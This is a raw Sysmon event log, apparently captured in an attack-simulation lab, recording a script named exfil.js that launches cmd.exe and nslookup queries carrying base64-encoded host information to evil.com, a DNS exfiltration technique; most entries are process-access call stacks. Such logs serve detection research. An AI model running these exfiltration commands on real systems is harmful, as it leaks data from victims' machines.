14:16:11.126{2E1864BB-17A1-629A-783D-000000005F02}55523588C:\Windows\System32\WScript.exe{2E1864BB-17AB-629A-4B3E-000000005F02}7848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.129{2E1864BB-17AB-629A-4B3E-000000005F02}7848C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlughvf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.110{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltxz.tmpMD5=B2B1D75715AF357A6B4398F385A141DD,SHA256=A1FA40C2F8588360C75C13349E8A2F679279989093D68809396DFBEE5B7D57B5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.089{2E1864BB-17AB-629A-493E-000000005F02}57364816C:\Windows\system32\conhost.exe{2E1864BB-17AB-629A-4A3E-000000005F02}5200C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.089{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.089{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.089{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-4A3E-000000005F02}5200C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.089{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.089{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.089{2E1864BB-17AB-629A-483E-000000005F02}73842336C:\Windows\system32\cmd.exe{2E1864BB-17AB-629A-4A3E-000000005F02}5200C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.094{2E1864BB-17AB-629A-4A3E-000000005F02}5200C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AB-629A-483E-000000005F02}7384C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltxz.tmp 2>&1 10341000x8000000000000000195462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.042{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17AB-629A-493E-000000005F02}5736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.042{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AB-629A-493E-000000005F02}5736C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.042{2E1864BB-17AB-629A-493E-000000005F02}57364816C:\Windows\system32\conhost.exe{2E1864BB-17AB-629A-483E-000000005F02}7384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.026{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-493E-000000005F02}5736C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.026{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.026{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.026{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.026{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.026{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-483E-000000005F02}7384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.026{2E1864BB-17A1-629A-783D-000000005F02}55525948C:\Windows\System32\WScript.exe{2E1864BB-17AB-629A-483E-000000005F02}7384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.031{2E1864BB-17AB-629A-483E-000000005F02}7384C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltxz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.010{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnlgqr.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.995{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AC-629A-763E-000000005F02}5744C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.995{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AC-629A-763E-000000005F02}5744C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.980{2E1864BB-17AC-629A-763E-000000005F02}57446224C:\Windows\system32\conhost.exe{2E1864BB-17AC-629A-753E-000000005F02}5748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.964{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-763E-000000005F02}5744C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.949{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.949{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.949{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.949{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.949{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-753E-000000005F02}5748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 